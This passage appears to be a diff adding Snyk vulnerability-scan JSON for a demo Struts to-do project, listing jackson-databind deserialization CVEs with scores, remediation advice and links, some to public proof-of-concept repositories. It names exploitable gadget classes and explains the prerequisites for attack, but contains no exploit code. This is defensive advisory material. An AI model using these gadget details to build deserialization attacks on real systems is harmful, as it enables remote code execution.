Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35490" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:37:26.422837Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:32:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:26.923105Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.762302Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35491" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:40:53.658144Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:40:13Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:57.453912Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "bu5yer" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2999", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-35728", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:43.478254Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", + "epssDetails": { + "percentile": "0.80006", + "probability": "0.00674", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35728" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-27T14:34:18.527699Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-27T14:05:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-27T17:34:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.852735Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.093517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36187" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T12:47:33.579319Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T12:44:41Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.970819Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.768509Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36184", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.169091Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36184" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:02:15.197495Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.700251Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 